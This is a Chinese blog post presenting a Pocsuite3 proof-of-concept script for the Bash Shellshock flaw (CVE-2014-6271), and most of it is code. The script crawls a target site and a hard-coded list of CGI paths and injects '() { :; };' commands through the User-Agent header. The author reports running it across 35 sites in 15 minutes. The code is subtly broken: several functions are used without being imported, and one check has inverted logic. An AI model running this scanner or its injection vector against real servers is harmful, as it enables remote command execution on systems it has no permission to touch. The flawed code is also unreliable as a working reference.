• Pocsuite3--编写破壳CVE-2014-6271_Shellshock的POC


    前言

    编写破壳CVE-2014-6271_Shellshock的POC,把公开出来的路径封装起来,作为Pocsuite3的验证POC

    情况1:网站无法访问,返回失败

    情况2:网站可以访问,无漏洞

    情况3:网站可以访问,有漏洞

    优先获取网站本身的cgi路径,如果没有,就用自带的cgi路径测试。

    代码

    15分钟,35个站点

    #!/usr/bin/env python
    # coding: utf-8
    from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests, logger
    import random
    import string
    import re
    
    dict = ["/cgi-bin/load.cgi",
            "/cgi-bin/gsweb.cgi",
            "/cgi-bin/redirector.cgi",
            "/cgi-bin/help.cgi",
            "/cgi-bin/about.cgi",
            "/cgi-bin/vidredirect.cgi",
            "/cgi-bin/click.cgi",
            "/cgi-bin/details.cgi",
            "/cgi-bin/log.cgi",
            "/cgi-bin/viewcontent.cgi",
            "/cgi-bin/content.cgi",
            "/cgi-bin/admin.cgi",
            "/cgi-bin/webmail.cgi",
            "/cgi-bin/authLogin.cgi",
            "/cgi-sys/entropysearch.cgi",
            "/cgi-sys/defaultwebpage.cgi",
            "/cgi-mod/index.cgi",
            "/cgi-bin/poc.cgi",
            "/cgi-bin/test.cgi",
            "/cgi-mod/index.cgi"
            ]
    
    class DemoPOC(POCBase):
        vulID = '0'
        version = '1' 
        author = 'shenyi' 
        vulDate = '2014-10-16' 
        createDate = '2014-10-16'
        updateDate = '2014-10-16'
        references = ['https://www.invisiblethreat.ca/2014/09/cve-2014-6271/'] 
        name = 'Bash 4.3 远程命令执行漏洞 POC'
        appPowerLink = 'http://www.gnu.org/software/bash/'
        appName = 'Bash'
        appVersion = '3.0-4.3#'
        vulType = 'Command Execution'
        desc = '''
                Bash 在解析环境变量时,会解析函数,同时可以运行函数后的语句,造成命令执行。
                '''
        samples = []
        install_requires = []
    
    
        def _verify(self):
            result = {}
            vul_url_result = "" # 存放漏洞结果的URL
            try:
                vul_url = get_url_need(self.url)
    
                if not vul_url:                              # 网站不存活状态,直接返回
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = vul_url_result
                    return self.parse_output(result)
                elif vul_url.endswith("/123456_test.cgi"):   # 未获取网页中的cgi链接状态
                    pass
                else:                                        # 获取.cgi、.sh链接
                    dict.insert(0,vul_url)
                random_str = ''.join(random.sample(string.ascii_letters + string.digits, 50))
                headers_fake = {}
                headers_fake['User-Agent'] = '() { :; }; echo; echo X-Bash-Test: %s' % random_str
                for url_path in dict:
                    try:
                        test_url = self.url + url_path
                        # response = requests.get(vul_url, headers=headers_fake)
                        response = requests.get(test_url, headers=headers_fake)
                        response = response.text
                        if 'X-Bash-Test: %s' % random_str == response.split('
    ')[0]:
                            vul_url_result = test_url
                    except:
                        pass
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = vul_url_result
            except Exception as e:
                logger.exception(e)
            return self.parse_output(result)
    
        def parse_output(self, result):
            output = Output(self)
            if result['VerifyInfo']['URL']:
                output.success(result)
            else:
                output.fail('target is not vulnerable')
            return output
    
        def _attack(self):
            return self._verify()
    
        def _shell(self):
            pass
    
    
    def get_url(url):
        try:
            return requests.get(url).url
        except:
            return url
    
    
    
    def get_url_need(url):
        url_need = None
    
        if not url.startswith('http'):
            url = 'http://%s' % url
        # 判断字符串是否以指定后缀结尾,如果以指定后缀结尾返回True,否则返回False。
        if url.endswith('.cgi') or url.endswith('.sh'):
            url_need = url
            return url_need
        # 验证HTTP有效性
        try:
            url = requests.get(url,timeout=10).url
        except:
            print("error : {}".format(url))  # 出错直接返回
            return ""
        # 获取主页连接
        url_need = get_link(url)
        # 如果没有获取到链接就使用自定义的CGI路径测试
        if not url_need:
            url_need =  url + "/123456_test.cgi"
    
        info = url_need
        # print info
        return info
    
    
    def get_link(url):
        rnt = ''
        try:
            page_content = requests.get(url).text
            match = re.findall(r'''(?:href|action|src)s*?=s*?(?:"|')s*?([^'"]*?.(?:cgi|sh|pl))''', page_content)
            for item_url in match:
                if not item_url.startswith('http'):
                    item_url = getAbsoluteURL(url, item_url)
                if not is_url_exist(item_url):
                    continue
                if isSameDomain(item_url, url):
                    rnt = item_url
                    break
            return rnt
        except  Exception as e:
            # raise e
            return rnt
    
    
    def getAbsoluteURL(base, url):
        url1 = urljoin(base, url)
        arr = urlparse(url1)
        path = normpath(arr[2])
        return urlunparse((arr.scheme, arr.netloc, path, arr.params, arr.query, arr.fragment))
    
    
    def is_url_exist(url):
        try:
            resp = requests.get(url)
            if resp.status_code == 404:
                return True
        except Exception as e:
            pass
        return False
    
    
    def isSameDomain(url1, url2):
        try:
            if urlparse(url1).netloc.split(':')[0] == urlparse(url2).netloc.split(':')[0]:
                return True
            else:
                return False
        except:
            return False
    
    
    register_poc(DemoPOC)
    
  • 相关阅读:
    利用线程池爬虫
    多任务协程怎么写
    利用协程多任务协程爬取前几页投诉网
    cookie的处理和代理池的建立
    bs4和xpath的用法
    怎么使用Ip代理词
    雪球网新闻标题的爬取
    爬虫学习的基础篇
    小说文本爬取
    24 张图彻底弄懂九大常见数据结构
  • 原文地址:https://www.cnblogs.com/17bdw/p/10926431.html
Copyright © 2020-2023  润新知